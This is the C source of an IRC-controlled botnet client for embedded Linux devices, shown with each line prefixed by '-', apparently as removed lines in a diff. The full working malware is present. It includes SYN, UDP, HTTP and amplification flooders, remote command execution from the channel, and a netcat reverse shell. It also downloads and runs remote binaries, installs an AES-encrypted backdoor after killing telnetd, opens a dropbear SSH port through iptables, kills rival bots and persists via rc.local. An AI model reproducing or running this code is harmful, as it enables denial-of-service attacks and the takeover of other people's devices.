- Send(sock, "NOTICE %s :Receiving update.\n", sender);
- system("mkdir /tmp");
- if (dgcc) {
- FILE *file=fopen("/tmp/.c","wb");
- char bufm[4096];
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- memset(buf,0,4096);
- sprintf(buf,"(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d; %s &) > /dev/null 2>&1",execfile,parent,execfile);
- }
- else {
- FILE *file=fopen("/tmp/.o","wb");
- unsigned char bufm[4096];
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done2;
- }
- }
- done2:
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- memset(buf,0,4096);
- //sprintf(buf,"(chmod 755 /tmp/.o;kill -9 %d; kill -9 %d;trap '' 1 2; /tmp/.o &) > /dev/null",actualparent,parent,execfile);
- //sprintf(buf,"chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall .o;sleep 5;trap \"\" 1;/tmp/.o '&");
- sprintf(buf,"export PATH=/usr/sbin:/bin:/usr/bin:/sbin:/var/bin;chmod +x /tmp/.o; trap '' 1;sh -c '/var/bin/killall knight*;/var/bin/killall kt*;/var/bin/killall .o;/var/bin/sleep 5;trap "" 1;/tmp/.o '&");
- }
- close(sock);
- close(sock2);
- system(buf);
- kill(9,0);
- exit(0);
- }
- void move(int sock, char *sender, int argc, char **argv) {
- if (argc < 1) {
- Send(sock, "NOTICE %s :MOVE <server>\n", sender);
- exit(1);
- }
- server=strdup(argv[1]);
- changeservers=1;
- close(sock);
- }
- void hackpkg(int sock, char *sender, int argc, char **argv) {
- int sock2,i,d;
- struct sockaddr_in server;
- unsigned long ipaddr;
- char buf[1024];
- FILE *file;
- mkdir("/var/bin", 0775);
- unsigned char bufm[4096];
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :HACKPGK <url> <binary name>\n", sender);
- exit(0);
- }
- if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
- Send(sock, "NOTICE %s :Unable to create socket.\n", sender);
- exit(0);
- }
- if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
- else strcpy(buf,argv[1]);
- for (i=0;i<strlen(buf) && buf[i] != '/';i++);
- buf[i]=0;
- server.sin_family = AF_INET;
- server.sin_port = htons(80);
- if ((ipaddr = inet_addr(buf)) == -1) {
- struct hostent *hostm;
- if ((hostm=gethostbyname(buf)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve address.\n", sender);
- exit(0);
- }
- memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
- }
- else server.sin_addr.s_addr = ipaddr;
- memset(&(server.sin_zero), 0, 8);
- if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
- Send(sock, "NOTICE %s :Unable to connect to http.\n", sender);
- exit(0);
- }
- Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
- Send(sock, "NOTICE %s :Receiving file.\n", sender);
- file=fopen(argv[2],"wb");
- while(1) {
- int i;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
- for (d+=4;d<i;d++) fputc(bufm[d],file);
- goto done;
- }
- }
- done:
- Send(sock, "NOTICE %s :Installed %s to hack path.\n", sender,argv[2]);
- while(1) {
- int i,d;
- if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
- if (i < 4096) bufm[i]=0;
- for (d=0;d<i;d++) fputc(bufm[d],file);
- }
- fclose(file);
- close(sock2);
- char MoveIt[255];
- sprintf(MoveIt, "cat %s > /var/bin/%s",argv[2],argv[2]);
- system(MoveIt);
- char DeleteIt[255];
- sprintf(DeleteIt, "rm %s",argv[2],argv[2]);
- system(DeleteIt);
- char String[255];
- sprintf(String, "chmod 775 /var/bin/%s",argv[2]);
- system(String);
- char String2[255];
- sprintf(String2, "ls -l /var/bin/%s",argv[2]);
- system(String2);
- exit(0);
- }
- void help(int sock, char *sender, int argc, char **argv) {
- if (mfork(sender) != 0) return;
- Send(sock, "NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n", sender); sleep(1);
- Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags> <packetsize> <pollinterval>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n", sender); sleep(1);
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :QUAKE3 <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :STD <ip> <port> <time>\n", sender); sleep(1);
- Send(sock, "NOTICE %s :NICK <nick> = Changes the nick of the client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SERVER <server> = Changes servers\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETSPOOFS = Gets the current spoofing\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n", sender); sleep(1);
- Send(sock, "NOTICE %s :DISABLE = Disables all packeting from this client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :ENABLE = Enables all packeting from this client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :KILL = Kills the client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n", sender); sleep(1);
- Send(sock, "NOTICE %s :UPDATE <http address> <src:bin> = Update this bot\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!\n", sender); sleep(1);
- Send(sock, "NOTICE %s :VERSION = Requests version of client\n", sender); sleep(1);
- Send(sock, "NOTICE %s :KILLALL = Kills all current packeting\n", sender); sleep(1);
- Send(sock, "NOTICE %s :HELP = Displays this\n", sender); sleep(1);
- Send(sock, "NOTICE %s :IRC <command> = Sends this command to the server\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SH <command> = Executes a command\n", sender); sleep(1);
- Send(sock, "NOTICE %s :ISH <command> = SH, interactive, sends to channel\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SHD <command> = Executes a psuedo-daemonized command\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETBB <tftp server> = Get a proper busybox\n", sender); sleep(1);
- Send(sock, "NOTICE %s :INSTALL <http server/file_name> = Download & install a binary to /var/bin \n", sender); sleep(1);
- Send(sock, "NOTICE %s :BASH <cmd> = Execute commands using bash. \n", sender); sleep(1);
- Send(sock, "NOTICE %s :BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n", sender); sleep(1);
- Send(sock, "NOTICE %s :SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n", sender); sleep(1);
- Send(sock, "NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n", sender); sleep(1);
- Send(sock, "NOTICE %s :LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n", sender); sleep(1);
- exit(0);
- }
- void killall(int sock, char *sender, int argc, char **argv) {
- unsigned long i;
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- if (sender) Send(sock, "NOTICE %s :Killing pid %d.\n", sender,pids[i]);
- kill(pids[i],9);
- }
- }
- }
- void killd(int sock, char *sender, int argc, char **argv) {
- char buf[1024]={0};
- if (disabled == 1) return;
- sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
- system(buf);
- exit(0);
- }
- struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
- { "PAN", pan },
- { "TCP", tcpflood },
- { "STD", sendSTD },
- { "UDP", udp },
- { "UNKNOWN", unknown },
- { "HTTPFLOOD", sendHTTP },
- { "NTP", ntp },
- { "BLACKNURSE", blacknurse },
- { "DNSAMP", dnsamp },
- { "QUAKE3", quake3 },
- { "PROXYFLUX", proxyflux },
- { "NICK", nickc },
- { "SERVER", move },
- { "GETSPOOFS", getspoofs },
- { "SPOOFS", spoof },
- { "HACKPKG", hackpkg },
- { "DISABLE", disable },
- { "ENABLE", enable },
- { "UPDATE", update },
- { "KILL", killd },
- { "GET", get },
- { "VERSION", version },
- { "KILLALL", killall },
- { "HELP", help },
- { (char *)0, (void (*)(int,char *,int,char **))0 } };
- void _PRIVMSG(int sock, char *sender, char *str) {
- int i;
- char *to, *message;
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- to=str;
- message=str+i+2;
- for (i=0;i<strlen(sender) && sender[i] != '!';i++);
- sender[i]=0;
- if (*message == '!' && !strcasecmp(to,chan)) {
- char *params[12], name[1024]={0};
- int num_params=0, m;
- message++;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- message[i]=0;
- if (strwildmatch(message,nick)) return;
- message+=i+1;
- if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock, "NOTICE %s :Unable to comply.\n", sender); else Send(sock, "%s\n",message+4);
- if (!strncmp(message,"SH ",3)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // SHD (daemonize sh command)
- if (!strncmp(message,"SHD ",4)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like to eliminate (in this case tftp). We really want to have the C program handle as much of these custom funcs as possible. I am not great with C, but proficient with Linux, so I added these.)
- if (!strncmp(message,"GETBB ",6)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // GETSSH (download, install, start dropbear; requires busybox for wget, mv, and some other things that are not always present on embedded devices)
- if (!strncmp(message,"GETSSH ",7)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use that instead of needing to download busybox/wget first)
- if (!strncmp(message,"INSTALL ",8)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // BINUPDATE http://server/file (like install, but updates the program)
- if (!strncmp(message,"BINUPDATE ",10)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to eliminate the dependency)
- if (!strncmp(message,"LOCKUP ",7)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverse shell function to eliminate that dependency)
- if (!strncmp(message,"RSHELL ",6)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- //SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server
- if (!strncmp(message,"SCAN ",5)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // !* BASH echo hello
- if (!strncmp(message,"BASH ",5)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- m=strlen(message);
- for (i=0;i<m;i++) {
- if (*message == ' ' || *message == 0) break;
- name[i]=*message;
- message++;
- }
- for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
- num_params++;
- if (num_params > 10) num_params=10;
- params[0]=name;
- params[num_params+1]="\0";
- m=1;
- while (*message != 0) {
- message++;
- if (m >= num_params) break;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- params[m]=(char*)malloc(i+1);
- strncpy(params[m],message,i);
- params[m][i]=0;
- m++;
- message+=i;
- }
- for (m=0; flooders[m].cmd != (char *)0; m++) {
- if (!strcasecmp(flooders[m].cmd,name)) {
- flooders[m].func(sock, sender,num_params-1,params);
- for (i=1;i<num_params;i++) free(params[i]);
- return;
- }
- }
- }
- }
- void _376(int sock, char *sender, char *str) {
- Send(sock, "MODE %s -xi\n",nick);
- Send(sock, "JOIN %s :%s\n",chan,key);
- Send(sock, "WHO %s\n",nick);
- startScanner(sock);
- }
- void _PING(int sock, char *sender, char *str) {
- Send(sock, "PONG %s\n",str);
- }
- void _352(int sock, char *sender, char *str) {
- int i,d;
- char *msg=str;
- struct hostent *hostm;
- unsigned long m;
- for (i=0,d=0;d<5;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if (!strcasecmp(msg,nick) && !spoofsm) {
- msg=str;
- for (i=0,d=0;d<3;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if ((m = inet_addr(msg)) == -1) {
- if ((hostm=gethostbyname(msg)) == NULL) {
- Send(sock, "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
- return;
- }
- memcpy((char*)&m, hostm->h_addr, hostm->h_length);
- }
- ((char*)&spoofs)[3]=((char*)&m)[0];
- ((char*)&spoofs)[2]=((char*)&m)[1];
- ((char*)&spoofs)[1]=((char*)&m)[2];
- ((char*)&spoofs)[0]=0;
- spoofsm=256;
- }
- }
- void _433(int sock, char *sender, char *str) {
- free(nick);
- nick=randstring(rand() % 9 + 4);
- }
- void _NICK(int sock, char *sender, char *str) {
- int i;
- for (i=0;i<strlen(sender) && sender[i] != '!';i++);
- sender[i]=0;
- if (!strcasecmp(sender,nick)) {
- if (*str == ':') str++;
- if (nick) free(nick);
- nick=strdup(str);
- }
- }
- struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
- { "352", _352 },
- { "376", _376 },
- { "433", _433 },
- { "422", _376 },
- { "PRIVMSG", _PRIVMSG },
- { "PING", _PING },
- { "NICK", _NICK },
- { (char *)0, (void (*)(int,char *,char *))0 } };
- void con() {
- struct sockaddr_in srv;
- unsigned long ipaddr,start;
- int flag;
- struct hostent *hp;
- start:
- sock=-1;
- flag=1;
- if (changeservers == 0) server=servers[rand()%numservers];
- changeservers=0;
- while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
- if (inet_addr(server) == 0 || inet_addr(server) == -1) {
- if ((hp = gethostbyname(server)) == NULL) {
- server=NULL;
- close(sock);
- goto start;
- }
- bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
- }
- else srv.sin_addr.s_addr=inet_addr(server);
- srv.sin_family = AF_INET;
- srv.sin_port = htons(6667);
- ioctl(sock,FIONBIO,&flag);
- start=time(NULL);
- while(time(NULL)-start < 10) {
- errno=0;
- if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
- setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
- setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
- setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
- return;
- }
- if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
- sleep(1);
- }
- server=NULL;
- close(sock);
- goto start;
- }
- int main(int argc, char **argv) {
- int on,i;
- char cwd[256],*str;
- FILE *file;
- botkill();
- #ifdef STARTUP
- str="/etc/rc.d/rc.local";
- file=fopen(str,"r");
- if (file == NULL) {
- str="/etc/rc.conf";
- file=fopen(str,"r");
- }
- if (file != NULL) {
- char outfile[256], buf[1024];
- int i=strlen(argv[0]), d=0;
- getcwd(cwd,256);
- if (strcmp(cwd,"/")) {
- while(argv[0][i] != '/') i--;
- sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
- while(!feof(file)) {
- fgets(buf,1024,file);
- if (!strcasecmp(buf,outfile)) d++;
- }
- if (d == 0) {
- FILE *out;
- fclose(file);
- out=fopen(str,"a");
- if (out != NULL) {
- fputs(outfile,out);
- fclose(out);
- }
- }
- else fclose(file);
- }
- else fclose(file);
- }
- #endif
- if (fork()) exit(0);
- #ifdef FAKENAME
- strncpy(argv[0],FAKENAME,strlen(argv[0]));
- for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
- #endif
- srand((time(NULL) ^ getpid()) + getppid());
- nick=randstring(rand() % 9 + 4);
- ident=randstring(rand() % 9 + 4);
- user=randstring(rand() % 9 + 4);
- chan=CHAN;
- key=KEY;
- server=NULL;
- sa:
- #ifdef IDENT
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- kill(pids[i],9);
- waitpid(pids[i],NULL,WNOHANG);
- }
- }
- pids=NULL;
- numpids=0;
- identd();
- #endif
- con();
- Send(sock, "NICK %s|%s|%s\nUSER %s localhost localhost :%s\n", PREFIX, getBuild(),nick,user,ident);
- while(1) {
- unsigned long i;
- fd_set n;
- struct timeval tv;
- FD_ZERO(&n);
- FD_SET(sock,&n);
- tv.tv_sec=60*20;
- tv.tv_usec=0;
- if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
- for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
- unsigned int *newpids,on;
- for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
- pids[on-1]=0;
- numpids--;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (on=0;on<numpids;on++) newpids[on]=pids[on];
- free(pids);
- pids=newpids;
- }
- if (FD_ISSET(sock,&n)) {
- char buf[4096], *str;
- int i;
- if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
- buf[i]=0;
- str=strtok(buf,"\n");
- while(str && *str) {
- char name[1024], sender[1024];
- filter(str);
- if (*str == ':') {
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(sender,str+1);
- strcpy(str,str+i+1);
- }
- else strcpy(sender,"*");
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(name,str);
- strcpy(str,str+i+1);
- for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock, sender,str);
- if (!strcasecmp(name,"ERROR")) goto sa;
- str=strtok((char*)NULL,"\n");
- }
- }
- }
- return 0;
- }